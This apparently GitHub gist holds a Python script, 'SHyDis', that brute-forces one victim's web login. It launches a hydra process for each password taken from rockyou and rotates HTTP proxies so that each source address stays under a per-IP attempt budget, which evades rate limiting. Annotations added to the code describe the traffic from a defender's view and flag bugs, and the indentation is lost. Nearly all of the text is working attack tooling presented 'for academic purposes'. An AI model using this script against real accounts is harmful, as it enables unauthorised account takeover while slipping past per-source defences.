@paced
Last active March 6, 2023 04:59
Non-stealthy process forking with web-form cracking. For academic purposes only.
#!/usr/bin/python
"""SHyDis V 0.1.1."""
import argparse
import datetime
import os
import subprocess
# NOTE(review): leading indentation was lost in this copy of the script, so the
# block nesting below is not visible; the statements are kept exactly as found.
#
# Command template for one hydra invocation: a single login (-l) and a single
# candidate password (-p) against one target. It is filled in further down
# with (wait, username, password, target), in that order.
HYDRA_COMMAND = "hydra -e sr -f -v -w %d -l %s -p %s %s"
# NOTE(review): not referenced anywhere in the code shown here.
TEMP_WORDLIST_FILENAME = "temp_wordlist.txt"
if __name__ == "__main__":
# Overall flow: read a proxy list and a wordlist, then give each proxy a batch
# of at most --tries candidate passwords for one username, starting one hydra
# process per candidate with that proxy placed in HYDRA_PROXY_HTTP.
#
# Defender's view of the resulting traffic: failed logins for one account
# arrive from many source addresses, each contributing at most --tries
# attempts. Per-source rate limits therefore see only a small slice; counting
# failures per account (lockout or back-off) and requiring MFA are the
# controls that bound this pattern, and "one username, many sources, steady
# failures" is the signature to alert on.
#
# Read through the arguments from the command line.
parser = argparse.ArgumentParser()
# Add required positional arguments.
parser.add_argument("username",
metavar="username",
help="Username of victim.")
parser.add_argument("target",
metavar="target",
help="Hostname of victim.")
parser.add_argument("proxies",
metavar="proxies",
help="A list of hosts used as HTTP proxies, one per line.")
# Add defaultable (therefore optional) flag arguments.
parser.add_argument("-t", "--tries", help="Tries per proxy.", default=100)
parser.add_argument("-w",
"--wait",
help="Seconds between attempts.",
default=3)
parser.add_argument("-l",
"--wordlist",
help="Where to find the default word list to use in cracking.",
default="/usr/share/wordlists/metasploit/rockyou.txt")
args = parser.parse_args()
# Read in the proxy list: one entry per line with trailing whitespace removed.
# Every line is kept, so a blank line in the file becomes an empty entry.
proxies = list()
with open(args.proxies) as proxy_file:
for row in proxy_file.readlines():
proxies.append(row.rstrip())
# Read in the word list. readlines() loads the whole file into memory before
# the entries are stripped and stored.
wordlist = list()
with open(args.wordlist) as wordlist_file:
for row in wordlist_file.readlines():
wordlist.append(row.rstrip())
wordlist.reverse() # We will be popping, so most common should be last.
# Give warning to the user if they aren't going to cover the wordlist.
# ratio = wordlist size / (tries per proxy * number of proxies); a value above
# 1 means the combined per-proxy budget is smaller than the wordlist.
ratio = 1.0 * len(wordlist) / (args.tries * len(proxies))
if ratio > 1.01:
# NOTE(review): no value is interpolated on the next line, so the "%f"
# placeholder is printed literally.
print("-- Warning: Your wordlist to total tries ratio is %f.")
print("-- This tool works best at a ratio between 0.5 and 1.0.")
print("-- If the number is too high, increase --tries.")
print("-- Press any key to continue, or ^C to terminate.")
# input() waits for a full line, i.e. the operator has to press Enter.
input()
else:
print("-- Ratio is %f." % ratio)
# Tell the user how long this approximately will take.
# The estimate is one wait interval per wordlist entry.
runtime = str(datetime.timedelta(seconds=len(wordlist) * args.wait))
print("-- Script executing with verbose switch.")
print("-- Estimated runtime: %s" % runtime)
# Execute script per proxy.
# Each proxy gets a copy of the current environment with HYDRA_PROXY_HTTP set
# to that proxy, then up to --tries entries are popped from the wordlist.
for proxy_host in proxies:
env = os.environ.copy()
env["HYDRA_PROXY_HTTP"] = proxy_host
for i in range(0, args.tries):
if len(wordlist) > 0:
# pop() takes from the end of the list, which after the reverse() above is
# the earliest remaining line of the wordlist file.
command = (
HYDRA_COMMAND % (
args.wait,
args.username,
wordlist.pop(),
args.target
)
)
# The full command, including the candidate password, is echoed to stdout.
print("-- EXECUTING: %s" % command)
# Popen returns as soon as the child is started; this loop never waits for a
# child to finish or inspects its exit status.
subprocess.Popen(command, env=env)
else:
break
# Stop moving on to further proxies once the wordlist is exhausted.
if len(wordlist) == 0:
break
# Printed when the launch loop ends; child processes are not waited on here.
print("-- Program terminated. Check STDOUT for output.")